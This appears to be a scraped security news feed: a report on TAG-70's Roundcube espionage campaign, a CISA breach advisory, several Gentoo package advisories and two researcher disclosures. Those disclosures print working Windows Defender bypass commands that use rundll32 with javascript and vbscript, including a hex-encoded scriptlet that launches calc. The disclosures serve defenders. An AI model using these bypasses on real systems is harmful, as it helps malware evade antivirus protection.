By Deeba Ahmed
Email servers compromised in 80 organizations as Russian-linked TAG-70 group targets European governments.
This is a post from HackRead.com Read the original post: Russian Hackers Hit Mail Servers in Europe for Political and Military Intel

A Russian-linked actor, TAG-70, has targeted mail servers in Ukraine, Georgia, and Poland, aiming to collect intelligence on European political and military activities, particularly related to Ukraine’s war efforts.

Recorded Future’s Insikt Group has identified TAG-70, a potential threat actor allegedly working for Belarus and Russia, targeting government, military, and infrastructure entities across Europe and Central Asia since December 2020. The latest round of attacks was observed between October and December 2023.

The group is also known as Winter Vivern, TA-473, and UAC-0114. According to Insikt Group’s report (PDF), Tag-70 was discovered exploiting cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers across Europe.

The group mainly targeted government, military, and national infrastructure in Georgia, Poland, and Ukraine whereas targets were also observed in Belgium, France, the Czech Republic, Germany, and the UK. 

TAG-70, reportedly, used social engineering techniques to gain unauthorized access to mail servers across 80 organizations, including the Iranian Embassies in Moscow and the Netherlands, and the Georgia Embassy in Sweden.

The campaign aimed to gather intelligence on European political and military affairs, potentially gaining strategic advantages or undermining European security and alliances. Servers were primarily affected in Ukraine (30.9%), Georgia (13.6%), and Poland (12.3%)

The geographical distribution of victims affected by the TAG-70s Roundcube exploit in October 2023, according to Recorded Future.

This espionage attack uses spearphishing emails to deliver JavaScript payloads, exploiting the Roundcube vulnerability tracked as CVE-2023-563. Malicious code logs users out of Roundcube, presenting a new sign-in window.

The zero-day exploit allowed unauthorized access to mail servers across 80 organizations, including transport, education, chemical, and biological research sectors. The activity is similar to previous campaigns by other Russian-aligned threat groups like BlueDelta and Sandworm, which also targeted email solutions like Roundcube.

The compromised email servers pose a significant risk to Ukraine’s war effort, diplomatic relations, and coalition partners. Researchers warn that cyber-espionage groups targeting webmail software platforms, including Roundcube, may expose sensitive information about Ukraine’s defence efforts, partner countries, and third-party cooperation. They predict that these groups will continue targeting these platforms as Ukraine’s conflict continues and tensions with the EU and NATO rise.

Organizations must patch Roundcube installations, detect indicators of compromise (IoCs), and implement robust cybersecurity measures to mitigate the threat. Other effective security measures include strengthening email security, preferring encryption, secure email gateways, regular audits, employee awareness training, and network segmentation. The sophisticated attack methods and potential national security impact highlight the need for vigilance and awareness.

****RELATED ARTICLES****

1.  **Microsoft Executives’ Emails Breached by Russia Hackers**
2.  **Russian Hackers Employ Telekopye Toolkit in Phishing Attacks**
3.  **Russian APT29 Hacked US Biomedical Giant in TeamCity Breach**
4.  **Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group**
5.  **Russian Midnight Blizzard Hackers Hit MS Teams in Precision Attack**

Russian Hackers Hit Mail Servers in Europe for Political and Military Intel

CISA has issued an advisory after the discovery of documents containing information about a state government organization’s network environment on a dark web brokerage site.

CISA (the Cybersecurity & Infrastructure Security Agency) has issued a cybersecurity advisory after the discovery of documents containing host and user information of a state government organization’s network environment—including metadata—on a dark web brokerage site.

An attacker managed to compromise network administrator credentials through the account of a former employee of the organization. The attacker managed to authenticate to an internal virtual private network (VPN) access point, further navigate the victim’s on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.

CISA suspects that the account details fell in the hands of the attacker through a data breach. This would not have posed a problem if the account had been disabled when the employee left. But the account still had access with administrative privileges to two virtualized servers including SharePoint and the workstation.

The incident responders’ logs revealed the attacker first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range.

On the SharePoint server, the attacker obtained global domain administrator credentials that were stored locally on the server. This account also provided the attacker with access to the on-premises Active Directory (AD) and Azure AD.

The attacker executed LDAP queries to collect user, host, and trust relationship information. The results of these queries are believed to have been among the information that was offered for sale.

**Mitigation advice**

When an employee leaves there may be several possible reasons not to immediately remove all their accounts. But you should at least remove their privileges as soon as possible and change the password.

The CISA advisory lists several points of advice about user accounts:

*   Review current administrator accounts and only maintain those that are essential for network management.
*   Restrict the use of multiple administrator accounts for one user.
*   Create separate administrator accounts for on-premises and Azure environments to segment access.
*   Implement the principle of least privilege and grant only access to what is necessary. It makes sense to revoke privileges after the task they were needed for is done.
*   Use phishing-resistant multifactor authentication (MFA). The only widely available phishing-resistant authentication is FIDO/WebAuthn authentication.

More general tips are:

*   **Account and group policies**: Set up a robust and continuous user management process to ensure accounts of offboarded employees are removed and can no longer access the network.
*   **Awareness of your environment**: Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
*   **Patching procedures**: If you do not have a Vulnerability and Patch Management solution, establish a routine patching cycle for all operating systems, applications, and software.
*   **Monitoring and logging**: It’s essential to keep an eye on what is happening in your environment so you are aware of atypical events and logs that can help you figure out what happened exactly.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Why keeping track of user accounts is important 

Gentoo Linux Security Advisory 202402-28 - Multiple vulnerabilities have been discovered in Samba, the worst of which can lead to remote code execution. Versions greater than or equal to 4.18.9 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Samba: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #891267, #910606, #915556  
       ID: 202402-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Samba, the worst of  
which can lead to remote code execution.

Background  
==========

Samba is a suite of SMB and CIFS client/server programs.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-fs/samba  < 4.18.9      >= 4.18.9

Description  
===========

Multiple vulnerabilities have been discovered in Samba. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Samba users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/samba-4.18.9"

References  
==========

[ 1 ] CVE-2018-14628  
      https://nvd.nist.gov/vuln/detail/CVE-2018-14628  
[ 2 ] CVE-2022-2127  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2127  
[ 3 ] CVE-2023-3347  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3347  
[ 4 ] CVE-2023-3961  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3961  
[ 5 ] CVE-2023-4091  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4091  
[ 6 ] CVE-2023-4154  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4154  
[ 7 ] CVE-2023-34966  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34966  
[ 8 ] CVE-2023-34967  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34967  
[ 9 ] CVE-2023-34968  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34968  
[ 10 ] CVE-2023-42669  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42669  
[ 11 ] CVE-2023-42670  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42670

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-28

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-28

Gentoo Linux Security Advisory 202402-27 - A vulnerability has been discovered in Glade which can lead to a denial of service. Versions greater than or equal to 3.38.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Glade: Denial of Service  
     Date: February 19, 2024  
     Bugs: #747451  
       ID: 202402-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Glade which can lead to a denial  
of service.

Background  
==========

Glade is a RAD tool to enable quick & easy development of user  
interfaces for the GTK+ toolkit (Version 3 only) and the GNOME desktop  
environment.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-util/glade  < 3.38.2      >= 3.38.2

Description  
===========

A vulnerability has been found in Glade which can lead to a denial of  
service when working with specific glade files.

Impact  
======

A crafted file may lead to crashes in Glade.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Glade users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-util/glade-3.38.2"

References  
==========

[ 1 ] CVE-2020-36774  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36774

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-27

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-27

Gentoo Linux Security Advisory 202402-26 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions greater than or equal to 115.7.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #924844  
       ID: 202402-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable     Unaffected  
----------------------  -------------  --------------  
www-client/firefox      < 115.7.0:esr  >= 115.7.0:esr  
                        < 122.0:rapid  >= 122.0:rapid  
www-client/firefox-bin  < 115.7.0:esr  >= 115.7.0:esr  
                        < 122.0:rapid  >= 122.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.7.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.7.0:esr"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-122.0:rapid"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-122.0:rapid"

References  
==========

[ 1 ] CVE-2024-0741  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0741  
[ 2 ] CVE-2024-0742  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0742  
[ 3 ] CVE-2024-0743  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0743  
[ 4 ] CVE-2024-0744  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0744  
[ 5 ] CVE-2024-0745  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0745  
[ 6 ] CVE-2024-0746  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0746  
[ 7 ] CVE-2024-0747  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0747  
[ 8 ] CVE-2024-0748  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0748  
[ 9 ] CVE-2024-0749  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0749  
[ 10 ] CVE-2024-0750  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0750  
[ 11 ] CVE-2024-0751  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0751  
[ 12 ] CVE-2024-0752  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0752  
[ 13 ] CVE-2024-0753  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0753  
[ 14 ] CVE-2024-0754  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0754  
[ 15 ] CVE-2024-0755  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0755  
[ 16 ] MFSA-2024-01  
[ 17 ] MFSA-2024-02  
[ 18 ] MFSA-2024-04

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-26

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-26

Back in 2022, the researcher released a proof of concept to bypass the Backdoor:JS/Relvelshe.A detection in Windows Defender but it no longer works as it was mitigated. However, adding a simple javascript try catch error statement and eval'ing the hex string, it executes as of the time of this post.

**Microsoft Windows Defender / Backdoor\_JS.Relvelshe.A Detection / Mitigation Bypass**

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Detection Mitigation Bypass Backdoor:JS/Relvelshe.A[CVE Reference]N/A[Security Issue]Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.[References]https://twitter.com/hyp3rlinx/status/1480657623947091968[Exploit/POC]1) python -m http.server 802) Open command prompt as Administrator3) rundll32  javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")Create file and host on server, this is contents of the "yo.tmp" file.<?xml version="1.0"?><component><script>try{<![CDATA[var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";var str = '';for (var n = 0; n < hex.length; n += 2) {str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));}eval(str)]]>}catch(e){eval(str)}</script></component>[Network Access]Local[Severity]High[Disclosure Timeline]Vendor Notification:  February 18, 2024: Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Windows Defender / Backdoor_JS.Relvelshe.A Detection / Mitigation Bypass

This is additional research regarding a mitigation bypass in Windows Defender. Back in 2022, the researcher disclosed how it could be easily bypassed by passing an extra path traversal when referencing mshtml but that issue has since been mitigated. However, the researcher discovered using multiple commas can also be used to achieve the bypass. This issue was addressed. The fix was short lived as the researcher found yet another third trivial bypass. Previously, the researcher disclosed 3 bypasses using rundll32 javascript, but this example leverages the VBSCRIPT and ActiveX engines.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Windows Defender VBScript Detection Mitigation BypassTrojanWin32Powessere.G[CVE Reference]N/A[Security Issue]Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution failand attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine.Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender withan "Access is denied" message.Trojan:Win32/Powessere.GCategory: TrojanThis program is dangerous and executes commands from an attacker.However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection.Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing.E.g.C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)[References]https://twitter.com/hyp3rlinx/status/1759260962761150468https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txthttps://lolbas-project.github.io/lolbas/Binaries/Rundll32/[Exploit/POC]Open command prompt as AdministratorC:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)Access is denied.C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)We win![Network Access]Local[Severity]High[Disclosure Timeline]Vendor Notification:  February 18, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Windows Defender / Trojan.Win32/Powessere.G VBScript Detection Bypass

Gentoo Linux Security Advisory 202402-25 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.7.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-25  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #918444, #920508, #924845  
       ID: 202402-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.7.0     >= 115.7.0  
mail-client/thunderbird-bin  < 115.7.0     >= 115.7.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.7.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.7.0"

References  
==========

[ 1 ] CVE-2023-3417  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3417  
[ 2 ] CVE-2023-3600  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3600  
[ 3 ] CVE-2023-4045  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4045  
[ 4 ] CVE-2023-4046  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4046  
[ 5 ] CVE-2023-4047  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4047  
[ 6 ] CVE-2023-4048  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4048  
[ 7 ] CVE-2023-4049  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4049  
[ 8 ] CVE-2023-4050  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4050  
[ 9 ] CVE-2023-4051  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4051  
[ 10 ] CVE-2023-4052  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4052  
[ 11 ] CVE-2023-4053  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4053  
[ 12 ] CVE-2023-4054  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4054  
[ 13 ] CVE-2023-4055  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4055  
[ 14 ] CVE-2023-4056  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4056  
[ 15 ] CVE-2023-4057  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4057  
[ 16 ] CVE-2023-4573  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4573  
[ 17 ] CVE-2023-4574  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4574  
[ 18 ] CVE-2023-4575  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4575  
[ 19 ] CVE-2023-4576  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4576  
[ 20 ] CVE-2023-4577  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4577  
[ 21 ] CVE-2023-4578  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4578  
[ 22 ] CVE-2023-4580  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4580  
[ 23 ] CVE-2023-4581  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4581  
[ 24 ] CVE-2023-4582  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4582  
[ 25 ] CVE-2023-4583  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4583  
[ 26 ] CVE-2023-4584  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4584  
[ 27 ] CVE-2023-4585  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4585  
[ 28 ] CVE-2023-5168  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5168  
[ 29 ] CVE-2023-5169  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5169  
[ 30 ] CVE-2023-5171  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5171  
[ 31 ] CVE-2023-5174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5174  
[ 32 ] CVE-2023-5176  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5176  
[ 33 ] CVE-2023-5721  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5721  
[ 34 ] CVE-2023-5724  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5724  
[ 35 ] CVE-2023-5725  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5725  
[ 36 ] CVE-2023-5726  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5726  
[ 37 ] CVE-2023-5727  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5727  
[ 38 ] CVE-2023-5728  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5728  
[ 39 ] CVE-2023-5730  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5730  
[ 40 ] CVE-2023-5732  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5732  
[ 41 ] CVE-2023-6204  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6204  
[ 42 ] CVE-2023-6205  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6205  
[ 43 ] CVE-2023-6206  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6206  
[ 44 ] CVE-2023-6207  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6207  
[ 45 ] CVE-2023-6208  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6208  
[ 46 ] CVE-2023-6209  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6209  
[ 47 ] CVE-2023-6212  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6212  
[ 48 ] CVE-2023-6856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6856  
[ 49 ] CVE-2023-6857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6857  
[ 50 ] CVE-2023-6858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6858  
[ 51 ] CVE-2023-6859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6859  
[ 52 ] CVE-2023-6860  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6860  
[ 53 ] CVE-2023-6861  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6861  
[ 54 ] CVE-2023-6862  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6862  
[ 55 ] CVE-2023-6863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6863  
[ 56 ] CVE-2023-6864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6864  
[ 57 ] CVE-2023-37201  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37201  
[ 58 ] CVE-2023-37202  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37202  
[ 59 ] CVE-2023-37207  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37207  
[ 60 ] CVE-2023-37208  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37208  
[ 61 ] CVE-2023-37211  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37211  
[ 62 ] CVE-2023-50761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-50761  
[ 63 ] CVE-2023-50762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-50762  
[ 64 ] CVE-2024-0741  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0741  
[ 65 ] CVE-2024-0742  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0742  
[ 66 ] CVE-2024-0746  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0746  
[ 67 ] CVE-2024-0747  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0747  
[ 68 ] CVE-2024-0749  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0749  
[ 69 ] CVE-2024-0750  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0750  
[ 70 ] CVE-2024-0751  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0751  
[ 71 ] CVE-2024-0753  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0753  
[ 72 ] CVE-2024-0755  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0755  
[ 73 ] MFSA-2024-01  
[ 74 ] MFSA-2024-02  
[ 75 ] MFSA-2024-04

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-25

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-25

Gentoo Linux Security Advisory 202402-21 - Multiple vulnerabilities have been discovered in QtNetwork, the worst of which could lead to execution of arbitrary code. Versions greater than or equal to 6.6.1-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtNetwork: Multiple Vulnerabilities  
     Date: February 18, 2024  
     Bugs: #907120, #921292  
       ID: 202402-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in QtNetwork, the worst of  
which could lead to execution of arbitrary code.

Background  
==========

QtNetwork provides a set of APIs for programming applications that use  
TCP/IP. It is part of the Qt framework.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  -------------  
dev-qt/qtbase     < 6.6.1-r2    >= 6.6.1-r2  
dev-qt/qtnetwork  < 5.15.12-r1  >= 5.15.12-r1

Description  
===========

Multiple vulnerabilities have been discovered in QtNetwork. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

